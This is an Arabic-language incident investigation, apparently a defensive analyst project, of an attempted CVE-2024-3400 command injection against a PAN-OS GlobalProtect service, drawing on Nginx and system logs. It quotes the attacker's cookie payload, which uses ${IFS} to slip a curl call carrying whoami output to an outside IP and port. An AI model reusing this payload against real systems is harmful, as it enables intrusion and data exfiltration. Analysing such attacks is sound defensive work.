
التحقيق في محاولة حقن أوامر في PAN-OS المرتبطة بـ CVE-2024-3400، مع تحليل تسليم الحمولة والمعالجة الداخلية والتحقق من التنفيذ بناءً على الأدلة المستمدة من السجلات.
يوثّق هذا المشروع التحقيق في محاولة حقن أوامر CVE-2024-3400 التي استهدفت خدمة PAN-OS GlobalProtect.
كان الهدف هو تحديد:
تم إطلاق تنبيه حرج يشير إلى وجود محاولة استغلال محتملة.

يحتوي الطلب على ملف تعريف ارتباط (Cookie) مُصمَّم خصيصًا:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

${IFS} يتجاوز تصفية المسافاتwhoami يحاول استرداد هوية النظامcurl يحاول إجراء اتصال خارجيهذه حمولة حقن أوامر
تؤكد سجلات Nginx أن الطلب وصل إلى الخادم:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl

تم قبول الطلب الخبيث ومعالجته.
تُظهر سجلات النظام أن الحمولة وصلت إلى المنطق الداخلي:

dt_curl)ومع ذلك:
فشل تحليل DNS → فشل الاتصال الخارجي
عنوان IP المهاجم:

هذا يؤكد أن مصدر المهاجم خارجي.
تفاعلت عناوين IP متعددة مع النظام قبل الهجوم:

فقط 144.172.79.92 مرتبط مباشرة بالاستغلال.
كانت هذه محاولة حقن أوامر حقيقية.
نجح المهاجم في:
ومع ذلك:
لا يوجد تنفيذ مؤكد أو اختراق للنظام
محاولة حقن أوامر
تمت معالجة الحمولة - لا يوجد تنفيذ أو تأثير مؤكد